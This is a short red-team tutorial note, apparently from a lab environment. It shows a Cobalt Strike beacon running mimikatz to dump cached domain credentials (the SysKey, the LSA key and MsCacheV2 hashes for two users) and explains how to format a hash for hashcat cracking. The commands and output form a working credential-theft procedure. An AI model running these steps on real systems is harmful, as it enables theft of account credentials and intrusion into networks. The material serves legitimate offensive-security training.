To crack domain cached credentials with hashcat, use the format $DCC2$<iterations>#<username>#<hash>. For the mimikatz output below, a valid hashcat hash would be $DCC2$10240#DEV\jking#0d50dee9ed3f29d00282168297090d2a. beacon> mimikatz !lsadump::cache Domain : WKSTN-2 SysKey : b9dc7de8b1972237bbbd7f82d970f79a Local name : WKSTN-2 ( S-1-5-21-2281971671-4135076198-2136761646 ) Domain name : DEV ( S-1-5-21-569305411-121244042-2357301523 ) Domain FQDN : dev.cyberbotic.io Policy subsystem is : 1.18 LSA Key(s) : 1, default {9f88abd7-1cb9-d741-372b-c883b3cbf843} [00] {9f88abd7-1cb9-d741-372b-c883b3cbf843} c38164900449d2c6d81b557198ab0cbda2c0ce1c9f57c717cb221032ba1adffb *Iteration is set to default (10240) [NL$1 - 9/1/2022 8:10:06 AM] RID : 00000450 (1104) User : DEV\bfarmer MsCacheV2 : 98e6eec9c0ce004078a48d4fd03f2419 [NL$2 - 9/1/2022 10:29:19 AM] RID : 00000451 (1105) User : DEV\jking MsCacheV2 : 0d50dee9ed3f29d00282168297090d2a